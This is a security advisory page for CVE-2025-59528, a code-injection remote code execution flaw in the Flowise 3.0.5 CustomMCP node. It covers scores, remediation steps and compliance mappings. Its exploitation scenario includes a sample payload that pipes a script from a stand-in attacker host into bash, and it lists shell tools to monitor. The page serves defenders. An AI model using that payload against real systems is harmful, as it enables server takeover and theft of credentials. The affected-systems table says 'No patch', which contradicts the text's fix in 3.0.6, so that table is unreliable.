CVE-2025-59528: Flowise: Unauthenticated RCE via MCP config injection

CRITICAL PoC AVAILABLE NUCLEI TEMPLATE CISA: ATTEND
Published September 22, 2025
CISO Take

Flowise 3.0.5 contains a maximum-severity (CVSS 10.0) unauthenticated remote code execution flaw: the CustomMCP node passes user-supplied configuration strings directly into JavaScript's `Function()` constructor with zero sanitization, granting attackers full Node.js runtime access including `child_process` and `fs` modules. With no privileges required, no user interaction needed, and a public proof-of-concept already available, any internet-exposed Flowise instance should be treated as actively compromised until patched. Flowise has 16 prior CVEs in the same package, and this class of vulnerability — server-side JavaScript injection in LLM orchestration tooling — is a particularly high-value target because these platforms typically run with broad filesystem and network access in AI production environments. Upgrade immediately to Flowise 3.0.6; if patching is blocked, restrict access to the CustomMCP node configuration endpoint via network controls and audit process execution logs for anomalous child_process spawning.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Maximum exploitability: CVSS 10.0 with network vector, low complexity, no privileges, no user interaction, and changed scope. The Function() constructor pattern is a well-understood exploit primitive — no specialized knowledge required to weaponize. Public PoC lowers the bar to script-kiddie level. Not yet in CISA KEV but given the trivial exploitation and critical severity, KEV addition is plausible. AI orchestration platforms like Flowise typically run in privileged positions within the data pipeline — with access to LLM API keys, database credentials, and internal services — dramatically amplifying post-exploitation blast radius beyond the vulnerable host itself.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Flowise npm No patch
Flowise npm No patch

How severe is it?

CVSS 3.1
10.0 / 10
EPSS
90.2%
chance of exploitation in 30 days
Higher than 100% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
VulnCheck KEV (exploitation reported — broader/earlier than CISA) — Apr 2026
CISA SSVC: Public PoC
Nuclei detection template available
EPSS exploit prediction: 90%
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Changed
C High
I High
A High

What should I do?

4 steps
  1. Immediate

    Upgrade Flowise to version 3.0.6 which patches the Function() constructor injection.

  2. If unable to patch

    Block external access to the Flowise API endpoint (default port 3000) at the network/WAF layer; restrict CustomMCP node usage via Flowise's built-in authorization controls if configured.

  3. Detection

    Monitor for anomalous child process spawning from the Flowise Node.js process (e.g., sh, bash, curl, wget, nc as child processes). Review Node.js application logs for unusual Function() constructor invocations. Search SIEM for outbound connections from the Flowise host to non-standard endpoints.

  4. Post-patch

    Rotate all credentials (LLM API keys, DB passwords, cloud tokens) accessible from the Flowise server environment — assume compromise if the server was internet-exposed on 3.0.5.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.6.2.5 - AI System Security
NIST AI RMF
MANAGE 2.2 - Mechanisms for AI Risk Response
OWASP LLM Top 10
LLM07 - Insecure Plugin Design

How many AI incidents are linked? (2)

AI Threat Alert incident classification, derived from public security reporting. Each item links to its original source.

Frequently Asked Questions

What is CVE-2025-59528?

Flowise 3.0.5 contains a maximum-severity (CVSS 10.0) unauthenticated remote code execution flaw: the CustomMCP node passes user-supplied configuration strings directly into JavaScript's `Function()` constructor with zero sanitization, granting attackers full Node.js runtime access including `child_process` and `fs` modules. With no privileges required, no user interaction needed, and a public proof-of-concept already available, any internet-exposed Flowise instance should be treated as actively compromised until patched. Flowise has 16 prior CVEs in the same package, and this class of vulnerability — server-side JavaScript injection in LLM orchestration tooling — is a particularly high-value target because these platforms typically run with broad filesystem and network access in AI production environments. Upgrade immediately to Flowise 3.0.6; if patching is blocked, restrict access to the CustomMCP node configuration endpoint via network controls and audit process execution logs for anomalous child_process spawning.

Is CVE-2025-59528 actively exploited?

A weaponized Metasploit module (exploit/multi/http/flowise_js_rce) exists for CVE-2025-59528, meaning the exploit is point-and-click and the risk of opportunistic exploitation is high.

How to fix CVE-2025-59528?

1. **Immediate**: Upgrade Flowise to version 3.0.6 which patches the Function() constructor injection. 2. **If unable to patch**: Block external access to the Flowise API endpoint (default port 3000) at the network/WAF layer; restrict CustomMCP node usage via Flowise's built-in authorization controls if configured. 3. **Detection**: Monitor for anomalous child process spawning from the Flowise Node.js process (e.g., `sh`, `bash`, `curl`, `wget`, `nc` as child processes). Review Node.js application logs for unusual `Function()` constructor invocations. Search SIEM for outbound connections from the Flowise host to non-standard endpoints. 4. **Post-patch**: Rotate all credentials (LLM API keys, DB passwords, cloud tokens) accessible from the Flowise server environment — assume compromise if the server was internet-exposed on 3.0.5.

What systems are affected by CVE-2025-59528?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM orchestration pipelines, MCP-connected AI tool chains, multi-model AI workflows.

What is the CVSS score for CVE-2025-59528?

CVE-2025-59528 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 90.18%.

What is the AI security impact?

Affected AI Architectures

agent frameworksLLM orchestration pipelinesMCP-connected AI tool chainsmulti-model AI workflows

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell
AML.T0083 Credentials from AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2.5
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM07

What are the technical details?

Original Advisory

Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The CustomMCP node allows users to input configuration settings for connecting to an external MCP server. This node parses the user-provided mcpServerConfig string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation. Specifically, inside the convertToValidJSONString function, user input is directly passed to the Function() constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as child_process and fs. This issue has been patched in version 3.0.6.

Exploitation Scenario

An attacker identifies an internet-exposed Flowise instance via Shodan/Censys (Flowise has a recognizable web UI fingerprint). They send a crafted POST request to the node configuration API endpoint (no authentication required in default deployments), embedding a JavaScript payload in the `mcpServerConfig` field — e.g., `require('child_process').exec('curl attacker.com/shell.sh | bash')`. The `convertToValidJSONString` function passes this directly to `new Function(userInput)()`, executing it with the Node.js process's full privileges. The attacker establishes a reverse shell, then systematically harvests all environment variables (LLM API keys, database URLs), reads the Flowise flows database to enumerate connected AI services, and uses the compromised server as a pivot point into the organization's internal AI infrastructure.

Weaknesses (CWE)

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

  • [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
  • [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Timeline

Published
September 22, 2025
Last Modified
September 23, 2025
First Seen
September 22, 2025

Scanner Template Available

A Nuclei vulnerability scanner template exists for this CVE. You can scan your infrastructure for this vulnerability immediately.

View template on GitHub
nuclei -t http/cves/2025/CVE-2025-59528.yaml -u https://target.example.com

Related Vulnerabilities